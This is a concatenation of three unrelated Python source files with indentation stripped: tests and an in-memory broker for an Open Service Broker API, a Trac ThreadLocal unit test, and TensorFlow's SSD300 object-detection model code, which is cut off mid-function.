def check_bind(self, binding_guid, instance_guid):
response = requests.put(
"http://localhost:5001/v2/service_instances/{}/service_bindings/{}?accepts_incomplete=true".format(
instance_guid, binding_guid),
data=json.dumps({
"service_id": self.service_guid,
"plan_id": self.plan_guid
}),
**self.request_ads
)
self.assertEqual(HTTPStatus.ACCEPTED, response.status_code)
operation = response.json().get('operation')
self.assertEqual('bind', operation)
return operation
def check_deprovision_after_deprovision_done(self, instance_guid):
response = requests.delete(
"http://localhost:5001/v2/service_instances/{}".format(instance_guid),
params={
'service_id': self.service_guid,
'plan_id': self.plan_guid,
'accepts_incomplete': 'true'
},
**self.request_ads)
self.assertEqual(HTTPStatus.GONE, response.status_code)
def check_deprovision(self, instance_guid, operation):
response = requests.delete(
"http://localhost:5001/v2/service_instances/{}".format(instance_guid),
params={
'service_id': self.service_guid,
'plan_id': self.plan_guid,
'accepts_incomplete': 'true'
},
**self.request_ads)
self.assertEqual(HTTPStatus.ACCEPTED, response.status_code)
operation = response.json()['operation']
self.assertEqual('deprovision', operation)
return operation
def check_last_operation_after_deprovision(self, instance_guid, operation):
response = requests.get(
"http://localhost:5001/v2/service_instances/{}/last_operation".format(instance_guid),
params={
'service_id': self.service_guid,
'plan_id': self.plan_guid,
'operation': operation
},
**self.request_ads)
self.assertEqual(HTTPStatus.GONE, response.status_code)
self.assertEqual('succeeded', response.json()['state'])
def check_last_operation_after_provision(self, instance_guid, operation):
response = requests.get(
"http://localhost:5001/v2/service_instances/{}/last_operation".format(instance_guid),
params={
'service_id': self.service_guid,
'plan_id': self.plan_guid,
'operation': operation
},
**self.request_ads)
self.assertEqual(HTTPStatus.OK, response.status_code)
self.assertEqual('succeeded', response.json()['state'])
def check_provision(self, instance_guid, org_guid, space_guid, service_guid, plan_guid):
response = requests.put(
"http://localhost:5001/v2/service_instances/{}?accepts_incomplete=true".format(instance_guid),
data=json.dumps({
"organization_guid": org_guid,
"space_guid": space_guid,
"service_id": service_guid,
"plan_id": plan_guid,
# "context": {
# "organization_guid": "org-guid-here",
# "space_guid": "space-guid-here",
# }
}),
**self.request_ads)
self.assertEqual(HTTPStatus.ACCEPTED, response.status_code)
operation = response.json().get('operation')
self.assertEqual('provision', operation)
return operation
def check_catalog(self, service_guid, plan_guid):
response = requests.get('http://localhost:5001/v2/catalog', **self.request_ads)
catalog = response.json()
self.assertEqual(HTTPStatus.OK, response.status_code)
# find service
for service in catalog['services']:
if service['name'] == 'InMemService':
break
else:
service = None
self.assertIsNotNone(service)
self.assertEqual(service_guid, service.get('id'))
self.assertTrue(service.get('instances_retrievable'))
self.assertTrue(service.get('bindings_retrievable'))
# find plan
for plan in service['plans']:
if plan['name'] == 'standard':
break
else:
plan = None
self.assertIsNotNone(plan)
self.assertEqual(plan_guid, plan.get('id'))
class InMemoryBroker(ServiceBroker):
CREATING = 'CREATING'
CREATED = 'CREATED'
BINDING = 'BINDING'
BOUND = 'BOUND'
UNBINDING = 'UNBINDING'
DELETING = 'DELETING'
def __init__(self, service_guid, plan_guid):
self.service_guid = service_guid
self.plan_guid = plan_guid
self.service_instances = dict()
def catalog(self) -> Union[Service, List[Service]]:
return Service(
id=self.service_guid,
name='InMemService',
description='InMemService',
bindable=True,
plans=[
ServicePlan(
id=self.plan_guid,
name='standard',
description='standard plan',
free=False,
)
],
instances_retrievable=True,
bindings_retrievable=True
)
def provision(self,
instance_id: str,
details: ProvisionDetails,
async_allowed: bool,
**kwargs) -> ProvisionedServiceSpec:
if not async_allowed:
raise errors.ErrAsyncRequired()
self.service_instances[instance_id] = {
'provision_details': details,
'state': self.CREATING
}
return ProvisionedServiceSpec(
state=ProvisionState.IS_ASYNC,
operation='provision'
)
def bind(self, instance_id: str, binding_id: str, details: BindDetails, async_allowed: bool, **kwargs) -> Binding:
if not async_allowed:
raise errors.ErrAsyncRequired()
instance = self.service_instances.get(instance_id, {})
if instance and instance.get('state') == self.CREATED:
instance['state'] = self.BINDING
return Binding(BindState.IS_ASYNC, operation='bind')
def unbind(self, instance_id: str, binding_id: str, details: UnbindDetails, async_allowed: bool,
**kwargs) -> UnbindSpec:
if not async_allowed:
raise errors.ErrAsyncRequired()
instance = self.service_instances.get(instance_id, {})
if instance and instance.get('state') == self.BOUND:
instance['state'] = self.UNBINDING
return UnbindSpec(True, 'unbind')
def deprovision(self, instance_id: str, details: DeprovisionDetails, async_allowed: bool,
**kwargs) -> DeprovisionServiceSpec:
if not async_allowed:
raise errors.ErrAsyncRequired()
instance = self.service_instances.get(instance_id)
if instance is None:
raise errors.ErrInstanceDoesNotExist()
if instance.get('state') == self.CREATED:
instance['state'] = self.DELETING
return DeprovisionServiceSpec(True, 'deprovision')
def last_operation(self, instance_id: str, operation_data: Optional[str], service_id: Optional[str], plan_id: Optional[str], **kwargs) -> LastOperation:
instance = self.service_instances.get(instance_id)
if instance is None:
raise errors.ErrInstanceDoesNotExist()
if instance.get('state') == self.CREATING:
instance['state'] = self.CREATED
return LastOperation(OperationState.SUCCEEDED)
elif instance.get('state') == self.DELETING:
del self.service_instances[instance_id]
raise errors.ErrInstanceDoesNotExist()
def last_binding_operation(self,
instance_id: str,
binding_id: str,
operation_data: Optional[str],
service_id: Optional[str],
plan_id: Optional[str],
**kwargs
) -> LastOperation:
instance = self.service_instances.get(instance_id, {})
if instance.get('state') == self.BINDING:
instance['state'] = self.BOUND
return LastOperation(OperationState.SUCCEEDED)
elif instance.get('state') == self.UNBINDING:
instance['state'] = self.CREATED
return LastOperation(OperationState.SUCCEEDED)
def get_instance(self, instance_id: str, **kwargs) -> GetInstanceDetailsSpec:
instance = self.service_instances.get(instance_id)
if instance is None:
raise errors.ErrInstanceDoesNotExist()
return GetInstanceDetailsSpec(
self.service_guid,
self.plan_guid
)
def get_binding(self, instance_id: str, binding_id: str, **kwargs) -> GetBindingSpec:
instance = self.service_instances.get(instance_id)
if instance is None:
raise errors.ErrInstanceDoesNotExist()
if instance.get('state') == self.BOUND:
return GetBindingSpec()
|
concurrency.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2010-2018 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
import threading
import unittest
from trac.util.concurrency import ThreadLocal
class ThreadLocalTestCase(unittest.TestCase):
def test_thread_local(self):
local = ThreadLocal(a=1, b=2)
local.b = 3
local.c = 4
local_dict = [local.__dict__.copy()]
def f():
local.b = 5
local.d = 6
local_dict.append(local.__dict__.copy())
thread = threading.Thread(target=f)
thread.start()
thread.join()
self.assertEqual(dict(a=1, b=3, c=4), local_dict[0])
self.assertEqual(dict(a=1, b=5, d=6), local_dict[1])
def test_suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(ThreadLocalTestCase))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
|
ssd_model.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""SSD300 Model Configuration.
References:
Wei Liu, Dragomir Anguelov, Dumitru Erhan, Christian Szegedy, Scott Reed,
Cheng-Yang Fu, Alexander C. Berg
SSD: Single Shot MultiBox Detector
arXiv:1512.02325
Ported from MLPerf reference implementation:
https://github.com/mlperf/reference/tree/ssd/single_stage_detector/ssd
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import multiprocessing
import os
import re
import threading
import tensorflow.compat.v1 as tf
# pylint: disable=g-direct-tensorflow-import
import constants
import mlperf
import ssd_constants
from cnn_util import log_fn
from models import model as model_lib
from models import resnet_model
from tensorflow.contrib import layers as contrib_layers
from tensorflow.python.ops import variables
BACKBONE_MODEL_SCOPE_NAME = 'resnet34_backbone'
class SSD300Model(model_lib.CNNModel):
"""Single Shot Multibox Detection (SSD) model for 300x300 image datasets."""
def __init__(self, label_num=ssd_constants.NUM_CLASSES, batch_size=32,
learning_rate=1e-3, backbone='resnet34', params=None):
super(SSD300Model, self).__init__('ssd300', 300, batch_size, learning_rate,
params=params)
# For COCO dataset, 80 categories + 1 background = 81 labels
self.label_num = label_num
# Currently only support ResNet-34 as backbone model
if backbone != 'resnet34':
raise ValueError('Invalid backbone model %s for SSD.' % backbone)
mlperf.logger.log(key=mlperf.tags.BACKBONE, value=backbone)
# Number of channels and default boxes associated with the following layers:
# ResNet34 layer, Conv7, Conv8_2, Conv9_2, Conv10_2, Conv11_2
self.out_chan = [256, 512, 512, 256, 256, 256]
mlperf.logger.log(key=mlperf.tags.LOC_CONF_OUT_CHANNELS,
value=self.out_chan)
# Number of default boxes from layers of different scales
# 38x38x4, 19x19x6, 10x10x6, 5x5x6, 3x3x4, 1x1x4
self.num_dboxes = [4, 6, 6, 6, 4, 4]
mlperf.logger.log(key=mlperf.tags.NUM_DEFAULTS_PER_CELL,
value=self.num_dboxes)
# TODO(haoyuzhang): in order to correctly restore in replicated mode, need
# to create a saver for each tower before graph is finalized. Use variable
# manager for better efficiency.
self.backbone_savers = []
# Collected predictions for eval stage. It maps each image id in eval
# dataset to a dict containing the following information:
# source_id: raw ID of image
# raw_shape: raw shape of image
# pred_box: encoded box coordinates of prediction
# pred_scores: scores of classes in prediction
self.predictions = {}
# Global step when predictions are collected.
self.eval_global_step = 0
# Average precision. In asynchronous eval mode, this is the latest AP we
# get so far and may not be the results at current eval step.
self.eval_coco_ap = 0
# Process, queues, and thread for asynchronous evaluation. When enabled,
# create a separate process (async_eval_process) that continuously pull
# intermediate results from the predictions queue (a multiprocessing queue),
# process them, and push final results into results queue (another
# multiprocessing queue). The main thread is responsible to push messages
# into predictions queue, and start a separate thread to continuously pull
# messages from results queue to update final results.
# Message in predictions queue should be a tuple of two elements:
# (evaluation step, predictions)
# Message in results queue should be a tuple of two elements:
# (evaluation step, final results)
self.async_eval_process = None
self.async_eval_predictions_queue = None
self.async_eval_results_queue = None
self.async_eval_results_getter_thread = None
# The MLPerf reference uses a starting lr of 1e-3 at bs=32.
self.base_lr_batch_size = 32
def skip_final_affine_layer(self):
return True
def gpu_preprocess_nhwc(self, images, phase_train=True):
try:
import ssd_dataloader # pylint: disable=g-import-not-at-top
except ImportError:
raise ImportError('To use the COCO dataset, you must clone the '
'repo https://github.com/tensorflow/models and add '
'tensorflow/models and tensorflow/models/research to '
'the PYTHONPATH, and compile the protobufs by '
'following https://github.com/tensorflow/models/blob/'
'master/research/object_detection/g3doc/installation.md'
'#protobuf-compilation ; To evaluate using COCO'
'metric, download and install Python COCO API from'
'https://github.com/cocodataset/cocoapi')
if phase_train:
images = ssd_dataloader.color_jitter(
images, brightness=0.125, contrast=0.5, saturation=0.5, hue=0.05)
images = ssd_dataloader.normalize_image(images)
return images
def add_backbone_model(self, cnn):
# --------------------------------------------------------------------------
# Resnet-34 backbone model -- modified for SSD
# --------------------------------------------------------------------------
# Input 300x300, output 150x150
cnn.conv(64, 7, 7, 2, 2, mode='SAME_RESNET', use_batch_norm=True)
cnn.mpool(3, 3, 2, 2, mode='SAME')
resnet34_layers = [3, 4, 6, 3]
version = 'v1'
# ResNet-34 block group 1
# Input 150x150, output 75x75
for i in range(resnet34_layers[0]):
# Last argument forces residual_block to use projection shortcut, even
# though the numbers of input and output channels are equal
resnet_model.residual_block(cnn, 64, 1, version)
# ResNet-34 block group 2
# Input 75x75, output 38x38
for i in range(resnet34_layers[1]):
stride = 2 if i == 0 else 1
resnet_model.residual_block(cnn, 128, stride, version, i == 0)
# ResNet-34 block group 3
# This block group is modified: first layer uses stride=1 so that the image
# size does not change in group of layers
# Input 38x38, output 38x38
for i in range(resnet34_layers[2]):
# The following line is intentionally commented out to differentiate from
# the original ResNet-34 model
# stride = 2 if i == 0 else 1
resnet_model.residual_block(cnn, 256, stride, version, i == 0)
# ResNet-34 block group 4: removed final block group
# The following 3 lines are intentionally commented out to differentiate
# from the original ResNet-34 model
# for i in range(resnet34_layers[3]):
# stride = 2 if i == 0 else 1
# resnet_model.residual_block(cnn, 512, stride, version, i == 0)
def add_inference(self, cnn):
cnn.use_batch_norm = True
cnn.batch_norm_config = {'decay': ssd_constants.BATCH_NORM_DECAY,
'epsilon': ssd_constants.BATCH_NORM_EPSILON,
'scale': True}
with tf.variable_scope(BACKBONE_MODEL_SCOPE_NAME):
self.add_backbone_model(cnn)
# --------------------------------------------------------------------------
# SSD additional layers
# --------------------------------------------------------------------------
def add_ssd_layer(cnn, depth, k_size, stride, mode):
return cnn.conv(
depth,
k_size,
k_size,
stride,
stride,
mode=mode,
use_batch_norm=False,
kernel_initializer=contrib_layers.xavier_initializer())
# Activations for feature maps of different layers
self.activations = [cnn.top_layer]
# Conv7_1, Conv7_2
# Input 38x38, output 19x19
add_ssd_layer(cnn, 256, 1, 1, 'valid')
self.activations.append(add_ssd_layer(cnn, 512, 3, 2, 'same'))
# Conv8_1, Conv8_2
# Input 19x19, output 10x10
add_ssd_layer(cnn, 256, 1, 1, 'valid')
self.activations.append(add_ssd_layer(cnn, 512, 3, 2, 'same'))
# Conv9_1, Conv9_2
# Input 10x10, output 5x5
add_ssd_layer(cnn, 128, 1, 1, 'valid')
self.activations.append(add_ssd_layer(cnn, 256, 3, 2, 'same'))
# Conv10_1, Conv10_2
# Input 5x5, output 3x3
add_ssd_layer(cnn, 128, 1, 1, 'valid')
self.activations.append(add_ssd_layer(cnn, 256, 3, 1, 'valid'))
# Conv11_1, Conv11_2
# Input 3x3, output 1x1
add_ssd_layer(cnn, 128, 1, 1, 'valid')
self.activations.append(add_ssd_layer(cnn, 256, 3, 1, 'valid'))
self.loc = []
self.conf = []
for nd, ac, oc in zip(self.num_dboxes, self.activations, self.out_chan):
l = cnn.conv(
nd * 4,
3,
3,
1,
1,
input_layer=ac,
num_channels_in=oc,
activation=None,
use_batch_norm=False,
kernel_initializer=contrib_layers.xavier_initializer())
scale = l.get_shape()[-1]
# shape = [batch_size, nd * 4, scale, scale]
l = tf.reshape(l, [self.batch_size, nd, 4, scale, scale])
# shape = [batch_size, nd, 4, scale, scale]
l = tf.transpose(l, [0, 1, 3, 4, 2])
# shape = [batch_size, nd, scale, scale, 4]
self.loc.append(tf.reshape(l, [self.batch_size, -1, 4]))
# shape = [batch_size, nd * scale * scale, 4]
c = cnn.conv(
nd * self.label_num,
3,
3,
1,
1,
input_layer=ac,
num_channels_in=oc,
activation=None,
use_batch_norm=False,
kernel_initializer=contrib_layers.xavier_initializer())
# shape = [batch_size, nd * label_num, scale, scale]
c = tf.reshape(c, [self.batch_size, nd, self.label_num, scale, scale])
# shape = [batch_size, nd, label_num, scale, scale]
c = tf.transpose(c, [0, 1, 3, 4, 2])
# shape = [batch_size, nd, scale, scale, label_num]
self.conf.append(tf.reshape(c, [self.batch_size, -1, self.label_num]))
# shape = [batch_size, nd * scale * scale, label_num]
# Shape of locs: [batch_size, NUM_SSD_BOXES, 4]
# Shape of confs: [batch_size, NUM_SSD_BOXES, label_num]
locs, confs = tf.concat(self.loc, 1), tf.concat(self.conf, 1)
# Pack location and confidence outputs into a single output layer
# Shape of logits: [batch_size, NUM_SSD_BOXES, 4+label_num]
logits = tf.concat([locs, confs], 2)
cnn.top_layer = logits
cnn.top_size = 4 + self.label_num
return cnn.top_layer
def get_learning_rate(self, global_step, batch_size):
rescaled_lr = self.get_scaled_base_learning_rate(batch_size)
# Defined in MLPerf reference model
boundaries = [160000, 200000]
boundaries = [b * self.base_lr_batch_size // batch_size for b in boundaries]
decays = [1, 0.1, 0.01]
learning_rates = [rescaled_lr * d for d in decays]
lr = tf.train.piecewise_constant(global_step, boundaries, learning_rates)
warmup_steps = int(118287 / batch_size * 5)
warmup_lr = (
rescaled_lr * tf.cast(global_step, tf.float32) / tf.cast(
warmup_steps, tf.float32))
return tf.cond(global_step < warmup_steps, lambda: warmup_lr, lambda: lr)
def get_scaled_base_learning_rate(self, batch_size):
"""Calculates base learning rate for creating lr schedule.
In replicated mode, gradients are summed rather than averaged which, with
the sgd and momentum optimizers, increases the effective learning rate by
lr * num_gpus. Dividing the base lr by num_gpus negates the increase.
Args:
batch_size: Total batch-size.
Returns:
Base learning rate to use to create lr schedule.
"""
base_lr = self.learning_rate
if self.params.variable_update == 'replicated':
base_lr = self.learning_rate / self.params.num_gpus
scaled_lr = base_lr * (batch_size / self.base_lr_batch_size)
return scaled_lr
def _collect_backbone_vars(self):
backbone_vars = tf.get_collection(
tf.GraphKeys.GLOBAL_VARIABLES, scope='.*'+ BACKBONE_MODEL_SCOPE_NAME)
var_list = {}
# Assume variables in the checkpoint are following the naming convention of
# a model checkpoint trained with TF official model
# TODO(haoyuzhang): the following variable name parsing is hacky and easy
# to break if there is change in naming convention of either benchmarks or
# official models.
for v in backbone_vars:
# conv2d variable example (model <-- checkpoint):
# v/cg/conv24/conv2d/kernel:0 <-- conv2d_24/kernel
if 'conv2d' in v.name:
re_match = re.search(r'conv(\d+)/conv2d/(.+):', v.name)
if re_match:
layer_id = int(re_match.group(1))
param_name = re_match.group(2)
vname_in_ckpt = self._var_name_in_official_model_ckpt(
'conv2d', layer_id, param_name)
var_list[vname_in_ckpt] = v
# batchnorm varariable example:
# v/cg/conv24/batchnorm25/gamma:0 <-- batch_normalization_25/gamma
elif 'batchnorm' in v.name:
re_match = re.search(r'batchnorm(\d+)/(.+):', v.name)
if re_match:
layer_id = int(re_match.group(1))
param_name = re_match.group(2)
vname_in_ckpt = self._var_name_in_official_model_ckpt(
'batch_normalization', layer_id, param_name)
var_list[vname_in_ckpt] = v
return var_list
def _var_name_in_official_model_ckpt(self, layer_name, layer_id, param_name):
"""Return variable names according to convention in TF official models."""
vname_in_ckpt = layer_name
if layer_id > 0:
vname_in_ckpt += '_' + str(layer_id)
vname_in_ckpt += '/' + param_name
return vname_in_ckpt
def loss_function(self, inputs, build_network_result):
logits = build_network_result.logits
# Unpack model output back to locations and confidence scores of predictions
# Shape of pred_loc: [batch_size, NUM_SSD_BOXES, 4]
# Shape of pred_label: [batch_size, NUM_SSD_BOXES, label_num]
pred_loc, pred_label = tf.split(logits, [4, self.label_num], 2)
# Shape of gt_loc: [batch_size, NUM_SSD_BOXES, 4]
# Shape of gt_label: [batch_size, NUM_SSD_BOXES, 1]
# Shape of num_gt: [batch_size]
_, gt_loc, gt_label, num_gt = inputs
gt_label = tf.cast(gt_label, tf.int32)
box_loss = self._localization_loss(pred_loc, gt_loc, gt_label, num_gt)
class_loss = self._classification_loss(pred_label, gt_label, num_gt)
tf.summary.scalar('box_loss', tf.reduce_mean(box_loss))
tf.summary.scalar('class_loss', tf.reduce_mean(class_loss))
return class_loss + box_loss
def _localization_loss(self, pred_loc, gt_loc, gt_label, num_matched_boxes):
"""Computes the localization loss.
Computes the localization loss using smooth l1 loss.
Args:
pred_loc: a flatten tensor that includes all predicted locations. The
shape is [batch_size, num_anchors, 4].
gt_loc: a tensor representing box regression targets in
[batch_size, num_anchors, 4].
gt_label: a tensor that represents the classification groundtruth targets.
The shape is [batch_size, num_anchors, 1].
num_matched_boxes: the number of anchors that are matched to a groundtruth
targets, used as the loss normalizater. The shape is [batch_size].
Returns:
box_loss: a float32 representing total box regression loss.
"""
mask = tf.greater(tf.squeeze(gt_label), 0)
float_mask = tf.cast(mask, tf.float32)
smooth_l1 = tf.reduce_sum(tf.losses.huber_loss(
gt_loc, pred_loc,
reduction=tf.losses.Reduction.NONE
), axis=2)
smooth_l1 = tf.multiply(smooth_l1, float_mask)
box_loss = tf.reduce_sum(smooth_l1, axis=1)
return tf.reduce_mean(box_loss / num_matched_boxes)
def _classification_loss(self, pred_label, gt_label, num_matched_boxes):
"""Computes the classification loss.
Computes the classification loss with hard negative mining.
Args:
pred_label: a flatten tensor that includes all predicted class. The shape
is [batch_size, num_anchors, num_classes].
gt_label: a tensor that represents the classification groundtruth targets.
The shape is [batch_size, num_anchors, 1].
num_matched_boxes: the number of anchors that are matched to a groundtruth
targets. This is used as the loss normalizater.
Returns:
box_loss: a float32 representing total box regression loss.
"""
cross_entropy = tf.losses.sparse_softmax_cross_entropy(
gt_label, pred_label, reduction=tf.losses.Reduction.NONE)
mask = tf.greater(tf.squeeze(gt_label), 0)
float_mask = tf.cast(mask, tf.float32)
# Hard example mining
neg_masked_cross_entropy = cross_entropy * (1 - float_mask)
relative_position = tf.argsort(
tf.argsort(
neg_masked_cross_entropy, direction='DESCENDING'))
num_neg_boxes = tf.minimum(
tf.to_int32(num_matched_boxes) * ssd_constants.NEGS_PER_POSITIVE,
ssd_constants.NUM_SSD_BOXES)
top_k_neg_mask = tf.cast(tf.less(
relative_position,
tf.tile(num_neg_boxes[:, tf.newaxis], (1, ssd_constants.NUM_SSD_BOXES))
), tf.float32)
class_loss = tf.reduce_sum(
tf.multiply(cross_entropy, float_mask + top_k_neg_mask), axis=1)
return tf.reduce_mean(class_loss / num_matched_boxes)
def add_backbone_saver(self):
# Create saver with mapping from variable names in checkpoint of backbone
# model to variables in SSD model
backbone_var_list = self._collect_backbone_vars()
self.backbone_savers.append(tf.train.Saver(backbone_var_list))
def load_backbone_model(self, sess, backbone_model_path):
for saver in self.backbone_savers:
saver.restore(sess, backbone_model_path)
def get_input_data_types(self, subset):
if subset == 'validation':
return [self.data_type, tf.float32, tf.float32, tf.float32, tf.int32]
return [self.data_type, tf.float32, tf.float32, tf.float32]
def get_input_shapes(self, subset):
"""Return encoded tensor shapes for train and eval data respectively."""
if subset == 'validation':
# Validation data shapes:
# 1. images
# 2. ground truth locations of boxes
# 3. ground truth classes of objects in boxes
# 4. source image IDs
# 5. raw image shapes
return [
[self.batch_size, self.image_size, self.image_size, self.depth],
[self.batch_size, ssd_constants.MAX_NUM_EVAL_BOXES, 4],
[self.batch_size, ssd_constants.MAX_NUM_EVAL_BOXES, 1],
[self.batch_size],
[self.batch_size, 3],
]
# Training data shapes:
# 1. images
# 2. ground truth locations of boxes
# 3. ground truth classes of objects in boxes
# 4. numbers of objects in images
return [
[self.batch_size, self.image_size, self.image_size, self.depth],
[self.batch_size, ssd_constants.NUM_SSD_BOXES, 4],
[self.batch_size, ssd_constants.NUM_SSD_BOXES, 1],
[self.batch_size]
]
def accuracy_function(self, inputs, logits):
"""Returns the ops to measure the mean precision of the model."""
try:
import ssd_dataloader # pylint: disable=g-import-not-at-top
from object_detection.box_coders import faster_rcnn_box_coder # pylint: disable=g-import-not-at-top
from object_detection.core import box_coder # pylint: disable=g-import-not-at-top
from object_detection.core import box_list # pylint: disable=g-import-not-at-top
except ImportError:
raise ImportError('To use the COCO dataset, you must clone the '
'repo https://github.com/tensorflow/models and add '
'tensorflow/models and tensorflow/models/research to '
'the PYTHONPATH, and compile the protobufs by '
'following https://github.com/tensorflow/models/blob/'
'master/research/object_detection/g3doc/installation.md'
'#protobuf-compilation ; To evaluate using COCO'
'metric, download and install Python COCO API from'
'https://github.com/cocodataset/cocoapi')
# Unpack model output back to locations and confidence scores of predictions
# pred_locs: relative locations (coordinates) of objects in all SSD boxes
# shape: [batch_size, NUM_SSD_BOXES, 4]
# pred_labels: confidence scores of objects being of all categories
# shape: [batch_size, NUM_SSD_BOXES, label_num]
pred_locs, pred_labels = tf.split(logits, [4, self.label_num], 2)
ssd_box_coder = faster_rcnn_box_coder.FasterRcnnBoxCoder(
scale_factors=ssd_constants.BOX_CODER_SCALES)
anchors = box_list.BoxList(
tf.convert_to_tensor(ssd_dataloader.DefaultBoxes()('ltrb')))
pred_boxes = box_coder.batch_decode(
encoded_boxes=pred_locs, box_coder=ssd_box_coder, anchors=anchors)
pred_scores = tf.nn.softmax(pred_labels, axis=2)
# TODO(haoyuzhang): maybe use `gt_boxes` and `gt_classes` for visualization.
_, gt_boxes, gt_classes, source_id, raw_shape = inputs # pylint: disable=unused-variable
return {
(constants.UNREDUCED_ACCURACY_OP_PREFIX +
ssd_constants.PRED_BOXES): pred_boxes,
(constants.UNREDUCED_ACCURACY_OP_PREFIX +
ssd_constants.PRED_SCORES): pred_scores,
# TODO(haoyuzhang): maybe use these values for visualization.
# constants.UNREDUCED_ACCURACY_OP_PREFIX+'gt_boxes': gt_boxes,
# constants.UNREDUCED_ACCURACY_OP_PREFIX+'gt_classes': gt_classes,
(constants.UNREDUCED_ACCURACY_OP_PREFIX +
ssd_constants.SOURCE_ID): source_id,
(constants.UNREDUCED_ACCURACY_OP_PREFIX +
ssd_constants.RAW_SHAPE): raw_shape
}
def postprocess(self, results):
"""Postprocess results returned from model."""
try:
import coco_metric # pylint: disable=g-import-not-at-top
except ImportError:
raise ImportError('To use the COCO dataset, you must clone the '
'repo https://github.com/tensorflow/models and add '
'tensorflow/models and tensorflow/models/research to '
'the PYTHONPATH, and compile the protobufs by '
'following https://github.com/tensorflow/models/blob/'
'master/research/object_detection/g3doc/installation.md'
'#protobuf-compilation ; To evaluate using COCO'
'metric, download and install Python COCO API from'
'https://github.com/cocodataset/cocoapi')
pred_boxes = results[ssd_constants.PRED_BOXES]
pred_scores = results[ssd_constants.PRED_SCORES]
# TODO(haoyuzhang): maybe use these values for visualization.
# gt_boxes = results['gt_boxes']
# gt_classes = results['gt_classes']
source_id = results[ssd_constants.SOURCE_ID]
raw_shape = results[ssd_constants.RAW_SHAPE]
# COCO evaluation requires processing COCO_NUM_VAL_IMAGES exactly once. Due
# to rounding errors (i.e., COCO_NUM_VAL_IMAGES % batch_size != 0), setting
# `num_eval_epochs` to 1 is not enough and will often miss some images. We
# expect user to set `num_eval_epochs` to >1, which will leave some unused
# images from previous steps in `predictions`. Here we check if we are doing
# eval at a new global step.
if results['global_step'] > self.eval_global_step:
self.eval_global_step = results['global_step']
self.predictions.clear()
for i, sid in enumerate(source_id):
self.predictions[int(sid)] = {
ssd_constants.PRED_BOXES: pred_boxes[i],
ssd_constants.PRED_SCORES: pred_scores[i],
ssd_constants.SOURCE_ID: source_id[i],
ssd_constants.RAW_SHAPE: raw_shape[i]
}
# COCO metric calculates mAP only after a full epoch of evaluation. Return
# dummy results for top_N_accuracy to be compatible with benchmar_cnn.py.
if len(self.predictions) >= ssd_constants.COCO_NUM_VAL_IMAGES:
log_fn('Got results for all {:d} eval examples. Calculate mAP...'.format(
ssd_constants.COCO_NUM_VAL_IMAGES))
annotation_file = os.path.join(self.params.data_dir,
ssd_constants.ANNOTATION_FILE)
# Size of predictions before decoding about 15--30GB, while size after
# decoding is 100--200MB. When using async eval mode, decoding takes
# 20--30 seconds of main thread time but is necessary to avoid OOM during
# inter-process communication.
decoded_preds = coco_metric.decode_predictions(self.predictions.values())
self.predictions.clear()
if self.params.collect_eval_results_async:
def _eval_results_getter():
"""Iteratively get eval results from async eval process."""
while True:
step, eval_results = self.async_eval_results_queue.get()
self.eval_coco_ap = eval_results['COCO/AP']
mlperf.logger.log_eval_accuracy(
self.eval_coco_ap, step, self.batch_size * self.params.num_gpus,
ssd_constants.COCO_NUM_TRAIN_IMAGES)
if self.reached_target():
# Reached target, clear all pending messages in predictions queue
# and insert poison pill to stop the async eval process.
while not self.async_eval_predictions_queue.empty():
self.async_eval_predictions_queue.get()
self.async_eval_predictions_queue.put('STOP')
break
if not self.async_eval_process:
# Limiting the number of messages in predictions queue to prevent OOM.
# Each message (predictions data) can potentially consume a lot of
# memory, and normally there should only be few messages in the queue.
# If often blocked on this, consider reducing eval frequency.
self.async_eval_predictions_queue = multiprocessing.Queue(2)
self.async_eval_results_queue = multiprocessing.Queue()
# Reason to use a Process as opposed to Thread is mainly the
# computationally intensive eval runner. Python multithreading is not
# truly running in parallel, a runner thread would get significantly
# delayed (or alternatively delay the main thread).
self.async_eval_process = multiprocessing.Process(
target=coco_metric.async_eval_runner,
args=(self.async_eval_predictions_queue,
self.async_eval_results_queue,
annotation_file))
self.async_eval_process.daemon = True
self.async_eval_process.start()
self.async_eval_results_getter_thread = threading.Thread(
target=_eval_results_getter, args=())
self.async_eval_results_getter_thread.daemon = True
self.async_eval_results_getter_thread.start()
self.async_eval_predictions_queue.put(
(self.eval_global_step, decoded_preds))
return {'top_1_accuracy': 0, 'top_5_accuracy': 0.}
eval_results = coco_metric.compute_map(decoded_preds, annotation_file)
self.eval_coco_ap = eval_results['COCO/AP']
ret = {'top_1_accuracy': self.eval_coco_ap, 'top_5_accuracy': 0.}
for metric_key, metric_value in eval_results.items():
ret[constants.SIMPLE_VALUE_RESULT_PREFIX + metric_key] = metric_value
mlperf.logger.log_eval_accuracy(self.eval_coco_ap, self.eval_global_step,
self.batch_size * self.params.num_gpus,
ssd_constants.COCO_NUM_TRAIN_IMAGES)
return ret
log_fn('Got {:d} out of {:d} eval examples.'
' Waiting for the remaining to calculate mAP...'.format(
len(self.predictions), ssd_constants.COCO_NUM_VAL_IMAGES))
return {'top_1_accuracy': self.eval_coco_ap, 'top_5_accuracy': 0.}
def get_synthetic_inputs(self, input_name, nclass):
"""Generating synthetic data matching real data shape and type."""
inputs = tf.random_uniform(
self.get_input_shapes('train')[0], dtype=self.data_type)
inputs = variables.VariableV1(inputs, trainable=False,
collections=[tf.GraphKeys.LOCAL_VARIABLES],
name=input_name)
boxes = tf.random_uniform(
[self.batch_size, ssd_constants.NUM_SSD_BOXES, 4], dtype=tf.float32)
classes = tf.random_uniform(
[self.batch_size, ssd_constants.NUM_SSD_BOXES, 1], dtype=tf.float32)
nboxes = tf.random_uniform(
[self.batch_size], minval=1, maxval=10, dtype=tf.float32)
